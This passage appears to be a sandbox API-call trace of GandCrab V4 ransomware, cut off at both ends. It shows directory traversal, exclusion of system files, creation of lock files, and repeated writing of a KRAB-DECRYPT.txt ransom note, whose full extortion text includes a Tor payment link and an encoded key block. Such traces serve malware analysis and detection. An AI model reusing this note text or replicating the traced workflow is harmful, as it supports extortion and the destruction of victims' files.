returned="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\*" [0100.112] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\*", lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0xffffffff [0100.112] CloseHandle (hObject=0x3a8) returned 1 [0100.112] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0 [0100.112] FindClose (in: hFindFile=0xfbe0a0 | out: hFindFile=0xfbe0a0) returned 1 [0100.112] CloseHandle (hObject=0x434) returned 1 [0100.113] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0100.113] lstrcmpW (lpString1="Roaming", lpString2=".") returned 1 [0100.113] lstrcmpW (lpString1="Roaming", lpString2="..") returned 1 [0100.113] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\", lpString2="Roaming" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming") returned="C:\\Users\\Default\\AppData\\Roaming" [0100.113] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\") returned="C:\\Users\\Default\\AppData\\Roaming\\" [0100.113] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0100.113] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0100.113] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0100.113] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0100.113] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0100.113] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.114] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.117] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\\\KRAB-DECRYPT.txt") returned 50 [0100.117] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0100.121] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0100.121] WriteFile (in: hFile=0x434, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338efa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338efa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0100.122] CloseHandle (hObject=0x434) returned 1 [0100.122] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.123] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.123] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2f, wMilliseconds=0x145)) [0100.123] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.123] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0100.124] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0100.124] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\d2ca4a08d2ca4dee3d.lock") returned 56 [0100.124] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\appdata\\roaming\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x434 [0100.125] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.125] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.125] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\") returned 33 [0100.125] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\*" [0100.125] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\*", lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0xfbdb20 [0100.126] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0100.126] FindNextFileW (in: hFindFile=0xfbdb20, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0100.126] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0100.126] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0100.126] FindNextFileW (in: hFindFile=0xfbdb20, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0100.126] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0100.126] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0100.126] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\Default\\AppData\\Roaming\\d2ca4a08d2ca4dee3d.lock" [0100.126] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.126] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 61 [0100.126] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\d2ca4a08d2ca4dee3d.lock") returned 56 [0100.126] lstrlenW (lpString=".lock") returned 5 [0100.126] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.127] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0100.127] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.127] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.127] FindNextFileW (in: hFindFile=0xfbdb20, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0100.127] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0100.127] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0100.127] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\KRAB-DECRYPT.txt") returned="C:\\Users\\Default\\AppData\\Roaming\\KRAB-DECRYPT.txt" [0100.127] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.128] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\KRAB-DECRYPT.txt.KRAB") returned 54 [0100.128] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\KRAB-DECRYPT.txt") returned 49 [0100.128] lstrlenW (lpString=".txt") returned 4 [0100.128] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.128] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0100.128] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.128] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\KRAB-DECRYPT.txt") returned 49 [0100.129] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\KRAB-DECRYPT.txt") returned 49 [0100.129] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0100.129] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0100.129] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0100.129] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0100.129] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0100.129] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0100.129] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0100.129] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0100.129] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0100.129] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0100.129] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.129] FindNextFileW (in: hFindFile=0xfbdb20, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0100.129] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0100.129] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0100.129] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\", lpString2="Microsoft" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft" [0100.129] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\" [0100.129] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0100.130] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0100.130] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0100.130] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0100.130] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0100.130] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.130] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.130] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\\\KRAB-DECRYPT.txt") returned 60 [0100.130] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0100.132] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0100.132] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338ed20, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338ed20*=0x1f6e, lpOverlapped=0x0) returned 1 [0100.133] CloseHandle (hObject=0x3a8) returned 1 [0100.133] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.134] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.134] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2f, wMilliseconds=0x155)) [0100.134] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.135] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0100.135] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0100.135] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\d2ca4a08d2ca4dee3d.lock") returned 66 [0100.135] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3a8 [0100.195] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.195] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.196] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\") returned 43 [0100.196] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*" [0100.196] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0xfbe0a0 [0100.196] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0100.196] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0100.196] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0100.196] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0100.196] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0100.196] 